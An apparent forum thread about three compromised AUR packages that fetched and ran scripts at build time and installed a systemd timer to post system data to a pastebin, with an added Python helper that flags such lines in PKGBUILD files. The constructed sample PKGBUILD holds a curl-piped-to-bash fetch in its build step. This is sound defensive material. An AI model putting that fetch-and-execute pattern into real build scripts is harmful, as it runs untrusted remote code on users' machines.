For those not reading [aur-general], three AUR packages were found compromised (https://lists.archlinux.org/pipermail/aur-general/2018-July/034151.html): acroread, balz and minergate. Details of the malicious actions (https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id=b3fec9f2f167) reveal a build-time fetch and execution of 2 scripts (which affects all users) and the installation of a systemd service and timer (which doesn't affect Artix, obviously). The purpose thereof was to gather system information and post it to a pastebin.
Upon closer inspection, the installed script contains a typo which should prevent it from functioning as intended, but let this be a reminder for everyone not to blindly trust user-uploaded content. The good news is this was quickly discovered, reported and fixed.
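The following is an added example, not part of the original post and not taken from the compromised packages: a small pre-build review helper that flags the two behaviours described above (a fetch executed at build time, and installation of a systemd service or timer) in a PKGBUILD or .install file. The rule names, the `audit` function and the sample PKGBUILD are constructed for illustration; a hit is a prompt to read the line, since legitimate packages also ship systemd units.

```python
import re

# Heuristics for the two behaviours the post describes: a fetch executed at
# build time, and installation of a systemd service/timer.
RULES = [
    ("fetch-piped-to-shell",
     re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("fetch-in-command-substitution",
     re.compile(r"(\$\(|`)\s*(curl|wget)\b")),
    ("systemd-unit-reference",
     re.compile(r"\S+\.(service|timer)\b|\bsystemctl\s+(enable|start)\b")),
]

def audit(text):
    """Return (line_number, rule, line) for every suspicious non-comment line."""
    findings = []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and full-line comments are not executed
        for rule, pattern in RULES:
            if pattern.search(line):
                findings.append((number, rule, line))
    return findings

# Constructed sample, not the real commit: placeholder host and file names.
SAMPLE_PKGBUILD = """\
pkgname=example-pkg
pkgver=1.0
source=("https://example.invalid/example-pkg-1.0.tar.gz")
# curl https://example.invalid/a | bash   (comment, ignored)
build() {
  curl -s https://example.invalid/setup | bash &
  make
}
package() {
  install -Dm644 example.timer "$pkgdir/usr/lib/systemd/system/example.timer"
  make DESTDIR="$pkgdir" install
}
"""

if __name__ == "__main__":
    for number, rule, line in audit(SAMPLE_PKGBUILD):
        print(f"line {number}: {rule}: {line}")
```

Run it against the PKGBUILD and any .install file of an AUR package before building; it only narrows down which lines to read first and does not replace reading the whole file.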
I read this elsewhere, pleasing to see that this was picked up and dealt with in a timely manner.
FWIW - I read it on the Arch subreddit on reddit
FWIW I read it in void forums first :)